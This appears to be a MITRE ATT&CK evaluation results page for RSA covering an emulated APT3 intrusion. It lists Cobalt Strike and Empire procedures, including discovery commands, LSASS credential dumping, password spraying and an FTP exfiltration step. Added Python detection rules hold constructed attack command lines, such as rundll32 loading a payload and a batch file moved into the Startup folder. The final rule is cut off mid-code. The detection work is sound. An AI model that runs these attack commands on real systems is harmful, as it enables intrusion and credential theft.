RSA: Results
Participant Configuration:  APT3

MITRE Engenuity does not assign scores, rankings, or ratings. The evaluation results are available to the public, so other organizations may provide their own analysis and interpretation - these are not endorsed or validated by MITRE.
 

Procedure: Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)
Procedure: Previously executed batch file (pdfhelper.cmd) launched a DLL payload (update.dat) using Rundll32
Procedure: Previously executed self-extracting archive (Resume Viewer.exe) launched an embedded batch file (pdfhelper.cmd)
Procedure: Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder
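
The chain above leaves two host artefacts that are cheap to check: rundll32.exe being handed a module whose extension is not a DLL-type extension (update.dat), and a file landing in a Startup folder (autoupdate.bat). The following is an added example of that check over Sysmon-style process-creation and file-creation events; it is not code from the page or from RSA, the events are constructed, and the paths and the "Start" entry point are assumptions.

```python
"""Flag the execution/persistence chain above in Sysmon-style telemetry.

Check 1: rundll32.exe handed a module whose extension is not a DLL-type
extension (update.dat).  Check 2: a file created in, or a command line that
targets, a Startup folder (autoupdate.bat).  All events below are constructed
for this example in Sysmon EID 1 (ProcessCreate) / EID 11 (FileCreate) style;
the entry point name "Start" and the paths are assumptions.
"""
import ntpath
import re
import shlex

# Same path tail for the per-user and the all-users Startup folder.
STARTUP_RE = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I)
# Extensions rundll32 is normally handed; anything else is worth a look.
RUNDLL32_OK_EXT = {".dll", ".cpl", ".ocx", ".ax", ".drv"}


def tokens(cmdline):
    """Split a Windows command line; posix=False keeps backslashes literal."""
    try:
        return shlex.split(cmdline, posix=False)
    except ValueError:
        return cmdline.split()


def rundll32_module(cmdline):
    """Module path rundll32 was asked to load, or None if this is not rundll32."""
    toks = tokens(cmdline)
    if len(toks) < 2 or ntpath.basename(toks[0].strip('"')).lower() != "rundll32.exe":
        return None
    # Syntax: rundll32.exe <module>,<EntryPoint> [args]; the module may be quoted.
    return toks[1].replace('"', "").split(",", 1)[0]


def flag_rundll32_nondll(events):
    """(parent image, module) for rundll32 loads of non-DLL-extension modules."""
    hits = []
    for ev in events:
        if ev["EventID"] != 1:
            continue
        module = rundll32_module(ev["CommandLine"])
        if module is not None and ntpath.splitext(module)[1].lower() not in RUNDLL32_OK_EXT:
            hits.append((ev["ParentImage"], module))
    return hits


def flag_startup_folder(events):
    """Startup-folder writes.  A same-volume move is a rename and raises no
    FileCreate, so command lines naming the folder are checked as well."""
    hits = []
    for ev in events:
        if ev["EventID"] == 11 and STARTUP_RE.search(ev["TargetFilename"]):
            hits.append(("file_create", ev["TargetFilename"]))
        elif ev["EventID"] == 1 and STARTUP_RE.search(ev["CommandLine"]):
            hits.append(("command_line", ev["CommandLine"]))
    return hits


# Constructed events mirroring the chain above; not telemetry from the evaluation.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\debbie\Downloads\Resume Viewer.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Users\debbie\Downloads\Resume Viewer.exe"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\debbie\Downloads\Resume Viewer.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\debbie\AppData\Local\Temp\pdfhelper.cmd"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'rundll32.exe "C:\Users\debbie\AppData\Local\Temp\update.dat",Start'},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c move autoupdate.bat "C:\Users\debbie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"'},
    # FileCreate as seen when the file is copied or extracted into the folder.
    {"EventID": 11, "Image": r"C:\Windows\System32\cmd.exe",
     "TargetFilename": r"C:\Users\debbie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autoupdate.bat"},
    # Benign control: a Control Panel applet opened through the usual shell32 entry point.
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
]

if __name__ == "__main__":
    for hit in flag_rundll32_nondll(EVENTS):
        print("rundll32 non-DLL module:", hit)
    for hit in flag_startup_folder(EVENTS):
        print("startup folder:", hit)
```

The extension allowlist is deliberately short; rundll32 loading a .dat, .txt or .png from a user-writable path is the point, and tuning is a matter of adding the few legitimate non-.dll cases an estate has.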

Procedure: Cobalt Strike: C2 channel established using port 53
Procedure: Cobalt Strike: C2 channel established using DNS traffic to freegoogleadsenseinfo.com
Procedure: Cobalt Strike: C2 channel established using both NetBIOS and base64 encoding
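
A DNS beacon has to encode its check-ins and data into the names it resolves, so a single host resolving many distinct, long, hex-looking labels under one registered domain is the observable. The following is an added example of scoring DNS queries for that pattern; it is not code from the page or from RSA, the events are constructed in Sysmon EID 22 (DnsQuery) style, and the labels and host names are assumptions rather than captured traffic.

```python
"""Score DNS lookups per registered domain for beacon/tunnel traits.

One host resolving many distinct, hex-looking labels under a single domain is
the signal; splitting the channel between HTTP and DNS (as later in this
scenario) still leaves this part visible.  Events are constructed in Sysmon
EID 22 style; the labels and hosts are assumptions, not captured traffic.
"""
from collections import defaultdict
import hashlib
import re

HEXISH = re.compile(r"^[0-9a-f]{8,}$")


def registered_domain(qname):
    """Last two labels.  Fine for .com; use a public-suffix list in production
    so co.uk-style suffixes are not treated as a registered domain."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def score_dns(events, min_unique=8, min_hex_ratio=0.6):
    """Domains with >= min_unique distinct subdomains where >= min_hex_ratio of
    the queries carry a hex-looking label."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(), "hexish": 0, "hosts": set()})
    for ev in events:
        q = ev["QueryName"].rstrip(".").lower()
        dom = registered_domain(q)
        s = stats[dom]
        s["queries"] += 1
        s["hosts"].add(ev["Computer"])
        sub = q[: -len(dom) - 1] if q != dom else ""
        if sub:
            s["subdomains"].add(sub)
            if any(HEXISH.match(label) for label in sub.split(".")):
                s["hexish"] += 1
    flagged = []
    for dom, s in stats.items():
        ratio = s["hexish"] / s["queries"]
        if len(s["subdomains"]) >= min_unique and ratio >= min_hex_ratio:
            flagged.append({"domain": dom, "unique_subdomains": len(s["subdomains"]),
                            "hex_ratio": round(ratio, 2), "hosts": sorted(s["hosts"])})
    return flagged


def _fake_label(i):
    """Deterministic hex label standing in for beacon-encoded data (constructed)."""
    return hashlib.sha256(f"beacon-{i}".encode()).hexdigest()[:12]


# Constructed: twelve beacon-style lookups from nimda, plus ordinary traffic.
EVENTS = [{"Computer": "nimda", "QueryName": f"{_fake_label(i)}.post.freegoogleadsenseinfo.com"}
          for i in range(12)]
EVENTS += [
    {"Computer": "nimda", "QueryName": "www.microsoft.com"},
    {"Computer": "nimda", "QueryName": "download.windowsupdate.com"},
    # Hashed CDN labels look the same shape but stay under the unique-count threshold here.
    {"Computer": "morris", "QueryName": "a1b2c3d4e5f6.cloudfront.net"},
    {"Computer": "morris", "QueryName": "0123456789ab.cloudfront.net"},
]

if __name__ == "__main__":
    for finding in score_dns(EVENTS):
        print(finding)
```

CDNs, DNS blocklists and anti-virus cloud lookups all use hashed labels legitimately, so the thresholds above need an allowlist of known domains before the rule goes live; the unique-subdomain count is what separates a beacon from a handful of CDN lookups.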

Procedure: Cobalt Strike: 'ipconfig -all' via cmd
Procedure: Cobalt Strike: 'arp -a' via cmd
Procedure: Cobalt Strike: 'echo' via cmd to enumerate specific environment variables
Procedure: Cobalt Strike: 'ps' (Process status) via Win32 APIs
Procedure: Cobalt Strike: 'tasklist -v' via cmd
Procedure: Cobalt Strike: 'sc query' via cmd
Procedure: Cobalt Strike: 'net start' via cmd
Procedure: Cobalt Strike: 'systeminfo' via cmd
Procedure: Cobalt Strike: 'net config workstation' via cmd
Procedure: Cobalt Strike: 'net localgroup administrators' via cmd
Procedure: Cobalt Strike: 'net localgroup administrators -domain' via cmd
Procedure: Cobalt Strike: 'net group "Domain Admins" -domain' via cmd
Procedure: Cobalt Strike: 'net group "Domain Admins" -domain' via cmd
Procedure: Cobalt Strike: 'net user -domain' via cmd
Procedure: Cobalt Strike: 'net user george -domain' via cmd
Procedure: Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key
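
Individually each of the commands above is something an administrator types; what distinguishes the beacon is a dozen distinct discovery commands from the same controlling process within a few minutes. The following is an added example of a sliding-window count that groups on the parent of the cmd.exe that Cobalt Strike spawns for each shell command; it is not code from the page or from RSA, the events are constructed in Sysmon EID 1 style, and the process GUIDs, timestamps and host names are assumptions.

```python
"""Sliding-window count of distinct discovery commands per controlling process.

Cobalt Strike's shell commands are spawned as cmd.exe /c <command> from the
beacon's host process, so the grouping key is the ParentProcessGuid of that
cmd.exe (the beacon host), not the parent of the discovery binary itself.
Events are constructed for this example in Sysmon EID 1 style; the GUIDs,
timestamps and host names are assumptions.
"""
from collections import defaultdict, deque
from datetime import datetime
import ntpath
import shlex

DISCOVERY_BINARIES = {"ipconfig", "arp", "tasklist", "systeminfo", "netstat",
                      "whoami", "route", "qprocess", "nltest", "hostname"}
DISCOVERY_SUBCOMMANDS = {("net", "start"), ("net", "config"), ("net", "localgroup"),
                         ("net", "group"), ("net", "user"), ("net", "view"),
                         ("net", "use"), ("sc", "query"), ("reg", "query"),
                         ("netsh", "advfirewall")}


def _split(cmdline):
    try:
        return shlex.split(cmdline, posix=False)
    except ValueError:
        return cmdline.split()


def _exe(tok):
    name = ntpath.basename(tok.strip('"')).lower()
    return name[:-4] if name.endswith(".exe") else name


def discovery_key(cmdline):
    """Normalise a command line to a key such as 'ipconfig' or 'net group', else None."""
    toks = _split(cmdline)
    if toks and _exe(toks[0]) == "cmd":
        # Unwrap cmd.exe /c <command> (or /k) so the real command is classified.
        lowered = [t.lower() for t in toks]
        idx = next((lowered.index(f) for f in ("/c", "/k") if f in lowered), None)
        toks = toks[idx + 1:] if idx is not None else []
    if not toks:
        return None
    exe = "net" if _exe(toks[0]) == "net1" else _exe(toks[0])
    if exe in DISCOVERY_BINARIES:
        return exe
    if len(toks) > 1 and (exe, toks[1].lower()) in DISCOVERY_SUBCOMMANDS:
        return f"{exe} {toks[1].lower()}"
    return None


def discovery_bursts(events, window_s=300, threshold=5):
    """One alert per controlling process when >= threshold distinct discovery
    keys fall inside a window_s-second window."""
    recent = defaultdict(deque)          # ParentProcessGuid -> deque of (time, key)
    alerted, alerts = set(), []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        key = discovery_key(ev["CommandLine"])
        if key is None:
            continue
        t = datetime.fromisoformat(ev["UtcTime"])
        parent = ev["ParentProcessGuid"]
        q = recent[parent]
        q.append((t, key))
        while (t - q[0][0]).total_seconds() > window_s:
            q.popleft()
        distinct = {k for _, k in q}
        if len(distinct) >= threshold and parent not in alerted:
            alerted.add(parent)
            alerts.append({"host": ev["Computer"], "parent": parent,
                           "count": len(distinct), "commands": sorted(distinct)})
    return alerts


def _ev(time, parent, cmd, host="nimda"):
    return {"UtcTime": time, "Computer": host, "ParentProcessGuid": parent,
            "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c " + cmd}


# Constructed: the beacon host ({B1}) running the sequence above, and an admin ({E1}).
EVENTS = [
    _ev("2018-10-30T15:01:00", "{B1}", "ipconfig -all"),
    _ev("2018-10-30T15:01:20", "{B1}", "arp -a"),
    _ev("2018-10-30T15:01:45", "{B1}", "tasklist -v"),
    _ev("2018-10-30T15:02:10", "{B1}", "sc query"),
    _ev("2018-10-30T15:02:30", "{B1}", "net start"),
    _ev("2018-10-30T15:02:50", "{B1}", "systeminfo"),
    _ev("2018-10-30T15:03:15", "{B1}", "net localgroup administrators"),
    _ev("2018-10-30T15:03:40", "{B1}", 'net group "Domain Admins" -domain'),
    _ev("2018-10-30T15:04:05", "{B1}", r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"),
    _ev("2018-10-30T09:00:00", "{E1}", "ipconfig -all", host="morris"),
    _ev("2018-10-30T09:00:30", "{E1}", "ping 10.0.0.5", host="morris"),
    _ev("2018-10-30T10:30:00", "{E1}", "net use", host="morris"),
]

if __name__ == "__main__":
    for alert in discovery_bursts(EVENTS):
        print(alert)
```

The alert fires once, at the fifth distinct command, so the analyst sees the burst early rather than after the whole enumeration has run; the same grouping works for Empire if the key is changed to the agent's powershell.exe ProcessGuid, since its shell commands spawn children of that process directly.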

Procedure: Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level
Procedure: Cobalt Strike: Built-in UAC bypass token duplication capability executed to modify current process token
Procedure: Cobalt Strike: 'ps' (Process status) via Win32 APIs
Procedure: Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe

Procedure: Cobalt Strike: 'net group "Domain Controllers" -domain' via cmd
Procedure: Cobalt Strike: 'net group "Domain Computers" -domain' via cmd
Procedure: Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd
Procedure: Cobalt Strike: 'netstat -ano' via cmd

Procedure: Cobalt Strike: Built-in Mimikatz credential dump capability executed
Procedure: Cobalt Strike: Credential dump capability involved process injection into lsass.exe
Procedure: Cobalt Strike: Built-in hash dump capability executed
Procedure: Cobalt Strike: Hash dump capability involved process injection into lsass.exe
Procedure: Cobalt Strike: Built-in token theft capability executed to change user context to George
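
Both the credential dumping here and the earlier injection of the callback into cmd.exe show up as one kind of telemetry: a handle opened on another process with more rights than a normal process needs. The following is an added example that classifies Sysmon EID 10 (ProcessAccess) events by target and granted access mask; it is not code from the page or from RSA, the events are constructed, the access constants are the Win32 PROCESS_* values, and the source images and masks are assumptions.

```python
"""Classify Sysmon EID 10 (ProcessAccess) events for the behaviours above:
LSASS memory reads (the Mimikatz and hashdump steps) and handles opened with
injection-capable rights on other processes (the callback injected into
cmd.exe).  Events are constructed for this example; the images and masks are
assumptions.  Sysmon EID 8 (CreateRemoteThread) corroborates the second case.
"""
import ntpath

PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
# Writing code into the target and starting a thread there needs all three.
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Sources that legitimately open LSASS on a stock Windows build; tune per estate.
# An allowlist by image name alone is bypassable by injecting into that image,
# so pair it with the signer or the full path in production.
LSASS_ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe", "lsm.exe"}


def classify_access(ev):
    src = ntpath.basename(ev["SourceImage"]).lower()
    tgt = ntpath.basename(ev["TargetImage"]).lower()
    access = int(ev["GrantedAccess"], 16)
    if tgt == "lsass.exe":
        # 0x1010 = VM_READ | QUERY_LIMITED_INFORMATION is the classic Mimikatz mask.
        if access & PROCESS_VM_READ and src not in LSASS_ALLOWLIST:
            return "credential_access"
        return None
    # Same-image parent/child (browser renderers, a debugger's own children) is routine.
    if src != tgt and (access & INJECT_MASK) == INJECT_MASK:
        return "process_injection"
    return None


def scan_process_access(events):
    findings = []
    for ev in events:
        category = classify_access(ev)
        if category:
            findings.append((category, ntpath.basename(ev["SourceImage"]),
                             ntpath.basename(ev["TargetImage"]), ev["GrantedAccess"]))
    return findings


LSASS = r"C:\Windows\System32\lsass.exe"
RUNDLL = r"C:\Windows\System32\rundll32.exe"       # host of the beacon DLL in this scenario
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
# Constructed events; not telemetry from the evaluation.
EVENTS = [
    {"SourceImage": RUNDLL, "TargetImage": LSASS, "GrantedAccess": "0x1010"},
    {"SourceImage": RUNDLL, "TargetImage": r"C:\Windows\System32\cmd.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": LSASS, "GrantedAccess": "0x1000"},
    {"SourceImage": CHROME, "TargetImage": CHROME, "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": RUNDLL, "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1F3FFF"},
]

if __name__ == "__main__":
    for finding in scan_process_access(EVENTS):
        print(finding)
```

The svchost.exe entry is left unflagged on purpose: a 0x1000 (QUERY_LIMITED_INFORMATION) handle on LSASS is normal, and alerting on "anything touching lsass" is what makes this class of rule get switched off.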

Procedure: Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)
Procedure: Cobalt Strike: C2 channel modified to use port 80
Procedure: Cobalt Strike: C2 channel modified to use HTTP traffic to freegoogleadsenseinfo.com
Procedure: Cobalt Strike: C2 channel modified to split communications between both HTTP and DNS
Procedure: Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)

Procedure: Added user Jesse to Conficker (10.0.0.5) through RDP connection
Procedure: Microsoft Management Console (Local Users and Groups snap-in) GUI utility used to add new user through RDP connection
Procedure: Microsoft Management Console (Local Users and Groups snap-in) GUI utility displayed user account information

Procedure: Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)
Procedure: Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)

Procedure: Cobalt Strike: 'dir -s -b "\\conficker\wormshare"' via cmd
Procedure: Cobalt Strike: 'tree "C:\Users\debbie"' via cmd

Procedure: Cobalt Strike: 'ps' (Process status) via Win32 APIs
Procedure: Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie
Procedure: Cobalt Strike: Keylogging capability included residual enumeration of application windows
Procedure: Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie
Procedure: Cobalt Strike: Screen capture capability involved process injection into explorer.exe
Procedure: Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
Procedure: Cobalt Strike: Built-in download capability executed to collect a file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Procedure: Cobalt Strike: Download capability exfiltrated data through existing C2 channel

Procedure: Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32
Procedure: Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
Procedure: RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
Procedure: RDP connection made to Conficker (10.0.0.5) as part of execution of persistence mechanism
Procedure: Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)
Footnotes
  • Vendor says launch command-line argument truncation resulted in PowerShell not being able to be decoded.

Procedure: Empire: C2 channel established using port 443
Procedure: Empire: C2 channel established using HTTPS traffic to freegoogleadsenseinfo.com
Procedure: Empire: Encrypted C2 channel established using HTTPS

Procedure: Empire: 'route print' via PowerShell
Procedure: Empire: 'ipconfig -all' via PowerShell
Procedure: Empire: 'whoami -all -fo list' via PowerShell
Procedure: Empire: 'qprocess *' via PowerShell
Procedure: Empire: 'net start' via PowerShell
Procedure: Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques
Procedure: Empire: WinEnum module included enumeration of user information
Procedure: Empire: WinEnum module included enumeration of AD group memberships
Procedure: Empire: WinEnum module included enumeration of password policy information
Procedure: Empire: WinEnum module included enumeration of recently opened files
Procedure: Empire: WinEnum module included enumeration of interesting files
Procedure: Empire: WinEnum module included enumeration of clipboard contents
Procedure: Empire: WinEnum module included enumeration of system information
Procedure: Empire: WinEnum module included enumeration of Windows update information
Procedure: Empire: WinEnum module included enumeration of system information via a Registry query
Procedure: Empire: WinEnum module included enumeration of services
Procedure: Empire: WinEnum module included enumeration of available shares
Procedure: Empire: WinEnum module included enumeration of mapped network drives
Procedure: Empire: WinEnum module included enumeration of AV solutions
Procedure: Empire: WinEnum module included enumeration of firewall rules
Procedure: Empire: WinEnum module included enumeration of network adapters
Procedure: Empire: WinEnum module included enumeration of established network connections
Procedure: Empire: 'net group "Domain Admins" -domain' via PowerShell
Procedure: Empire: 'Net Localgroup Administrators' via PowerShell
Procedure: Empire: 'net user' via PowerShell
Procedure: Empire: 'net user -domain' via PowerShell
Procedure: Empire: 'net group "Domain Computers" -domain' via PowerShell
Procedure: Empire: 'net use' via PowerShell
Procedure: Empire: 'netstat -ano' via PowerShell
Procedure: Empire: 'reg query' via PowerShell to enumerate a specific Registry key

Procedure: Empire: Built-in UAC bypass token duplication module executed to launch new callback with elevated process integrity level
Procedure: Empire: UAC bypass module downloaded and wrote a new Empire stager (wdbypass) to disk
Procedure: Empire: UAC bypass module downloaded a new Empire stager (wdbypass) over HTTP
Procedure: Empire: UAC bypass module downloaded a new Empire stager (wdbypass) over port 8080

Procedure: Empire: Built-in keylogging module executed to capture keystrokes of user Bob
Procedure: Empire: Built-in keylogging module included residual enumeration of application windows
Procedure: Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Procedure: Empire: 'net use' via PowerShell for brute-force password-spraying authentication attempts against Morris (10.0.1.4) and Nimda (10.0.1.6), targeting credentials of users Kmitnick, Bob, and Frieda
Procedure: Empire: Brute force password spraying attempts targeted Windows admin shares on Morris (10.0.1.4) and Nimda (10.0.1.6)
Procedure: Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
Procedure: Empire: Successful authentication targeted Windows admin share on Conficker (10.0.0.5)
Procedure: Empire: Successful authentication to Conficker (10.0.0.5) using credentials of user Kmitnick as a result of the brute force password spraying
Procedure: Empire: 'net use -delete' via PowerShell
Procedure: Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)
Procedure: Empire: 'net use' via PowerShell to successfully authenticate to Creeper (10.0.0.4) using credentials of user Kmitnick
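
The spray above is visible from the target side as Security 4625 failures for several accounts from one source address in a short window, followed by a 4624 network logon (LogonType 3, which is what admin-share access produces) from that same source. The following is an added example of that correlation; it is not code from the page or from RSA, the events are constructed, and the addresses, account names and times are assumptions. Because failures are logged on each target host, the events have to be centralised before a rule like this can see the pattern.

```python
"""Password-spray detection on Windows Security 4625/4624 events.

One source address failing against several accounts inside a short window is
the spray; a network logon (LogonType 3, used for admin-share access) from the
same source shortly after is the success worth paging on.  Failures are logged
on each target host, so the events must be centralised before this runs.
Constructed events; the addresses, names and times are assumptions.
"""
from collections import defaultdict, deque
from datetime import datetime


def detect_spray(events, window_s=600, min_users=3):
    failures = defaultdict(deque)   # IpAddress -> deque of (time, user, target host)
    spray_seen = {}                 # IpAddress -> time the spray was first flagged
    alerts = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        t = datetime.fromisoformat(ev["TimeCreated"])
        src = ev["IpAddress"]
        if ev["EventID"] == 4625:
            # Both "bad password" and "no such user" sub-statuses count; a sprayer
            # guessing account names produces the latter.
            q = failures[src]
            q.append((t, ev["TargetUserName"].lower(), ev["Computer"]))
            while (t - q[0][0]).total_seconds() > window_s:
                q.popleft()
            users = {u for _, u, _ in q}
            if len(users) >= min_users and src not in spray_seen:
                spray_seen[src] = t
                alerts.append({"type": "password_spray", "source": src,
                               "users": sorted(users), "targets": sorted({h for _, _, h in q})})
        elif (ev["EventID"] == 4624 and ev.get("LogonType") == 3 and src in spray_seen
              and (t - spray_seen[src]).total_seconds() <= window_s):
            alerts.append({"type": "spray_success", "source": src,
                           "user": ev["TargetUserName"], "target": ev["Computer"]})
    return alerts


def _ev(event_id, time, host, user, src, logon_type=3):
    return {"EventID": event_id, "TimeCreated": time, "Computer": host,
            "TargetUserName": user, "IpAddress": src, "LogonType": logon_type}


# Constructed: CodeRed (10.0.1.5) spraying Morris and Nimda, then authenticating to Conficker.
EVENTS = [
    _ev(4625, "2018-10-30T16:00:01", "morris", "Kmitnick", "10.0.1.5"),
    _ev(4625, "2018-10-30T16:00:02", "morris", "Bob", "10.0.1.5"),
    _ev(4625, "2018-10-30T16:00:03", "morris", "Frieda", "10.0.1.5"),
    _ev(4625, "2018-10-30T16:00:04", "nimda", "Kmitnick", "10.0.1.5"),
    _ev(4625, "2018-10-30T16:00:05", "nimda", "Bob", "10.0.1.5"),
    _ev(4625, "2018-10-30T16:00:06", "nimda", "Frieda", "10.0.1.5"),
    _ev(4624, "2018-10-30T16:00:20", "conficker", "Kmitnick", "10.0.1.5"),
    # Benign control: one mistyped password and an interactive logon from elsewhere.
    _ev(4625, "2018-10-30T16:05:00", "nimda", "debbie", "10.0.0.9"),
    _ev(4624, "2018-10-30T16:05:10", "nimda", "debbie", "10.0.0.9", logon_type=2),
]

if __name__ == "__main__":
    for alert in detect_spray(EVENTS):
        print(alert)
```

Grouping on the source address rather than the target account is what makes this a spray rule rather than a lockout rule: three accounts tried once each never trip an account lockout threshold, which is exactly why attackers spray.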

Procedure: Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)
Procedure: Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick
Procedure: Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)

Procedure: Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)
Procedure: Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)
Procedure: Empire: 'sc description' via PowerShell to remotely disguise a service on Creeper (10.0.0.4)
Procedure: Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)
Procedure: Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)
Procedure: Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)

Procedure: Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services
Procedure: Empire: 'reg query' via PowerShell to enumerate a specific Registry key

Procedure: Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe
Procedure: Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe
Procedure: Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe

Procedure: Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
Procedure: Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)
Procedure: Empire: 'copy' via PowerShell collected a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Procedure: Empire: File dropped to disk is a renamed copy of the WinRAR binary
Footnotes
  • Telemetry later identified recycler.exe as WinRAR during execution; no detections identified it as WinRAR upon file copy.
Procedure: Empire: Built-in upload module executed to write binary (recycler.exe) to disk on CodeRed (10.0.1.5)
Procedure: Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file
Footnotes
  • Vendor stated alert logic exists for many files being accessed in a short period of time, which was not triggered in the evaluation because only one file was accessed.
Procedure: Empire: Executed binary (recycler.exe) created encrypted archive (old.rar) of previously collected file
Footnotes
  • Vendor stated alert logic exists for many files being accessed in a short period of time, which was not triggered in the evaluation because only one file was accessed.
Procedure: Empire: Executed binary (recycler.exe) is a renamed copy of the WinRAR binary
Footnotes
  • Vendor stated alert logic exists for many files being accessed in a short period of time, which was not triggered in the evaluation because only one file was accessed.
  • Vendor stated a file hash is also available that could be used with sources like VirusTotal to identify the binary. YARA is also supported and rules could be created to identify WinRAR.

Procedure: Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through a network connection separate from the existing C2 channel
Procedure: Empire: 'del C:\$Recycle.bin\old.rar'
Footnotes
  • The master file table on 10.0.1.5 (CodeRed) was inspected through the capability to look for deleted files, showing old.rar.
Procedure: Empire: 'del recycler.exe'
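
The echo-then-ftp pattern above has a telemetry wrinkle worth knowing: in an Empire agent the echo lines run inside the existing powershell.exe, so they never appear as process creations, while the ftp.exe launch does. The echo lines are visible in PowerShell script block logging (Security 4104). The following is an added example that joins the two sources, flagging ftp.exe started with a -s: script and enriching it with the redirections that built that script; it is not code from the page or from RSA, the events are constructed, and the server address, credentials and file names are assumptions.

```python
"""Link the echo-assembled script to the ftp.exe run that consumes it.

ftp.exe -s:<file> runs commands from a file.  In an Empire agent the echo
lines run inside the existing powershell.exe (visible as 4104 script blocks,
not as process creations); the ftp.exe launch is a process creation.  An
ftp.exe with -s: is flagged on its own, since ftp.exe is rare on workstations,
and enriched with the echo redirections that wrote the same file name.
Events are constructed; the address, credentials and file names are assumptions.
"""
from collections import defaultdict
import ntpath
import re

REDIRECT_RE = re.compile(r">>?\s*\"?([^\s\"]+)")            # target of > or >>
FTP_SCRIPT_RE = re.compile(r"(?:^|\s)-s:\"?([^\s\"]+)", re.I)  # ftp -s:<file>


def ftp_script_exfil(events):
    writers = defaultdict(list)          # script file basename -> echo lines seen so far
    findings = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        text = ev["Text"].strip()
        if ev["Kind"] == "scriptblock":
            if text.lower().startswith("echo"):
                m = REDIRECT_RE.search(text)
                if m:
                    writers[ntpath.basename(m.group(1)).lower()].append(text)
        elif ev["Kind"] == "process" and ntpath.basename(ev["Image"]).lower() == "ftp.exe":
            m = FTP_SCRIPT_RE.search(text)
            if m:
                script = ntpath.basename(m.group(1)).lower()
                findings.append({"host": ev["Computer"], "script": script,
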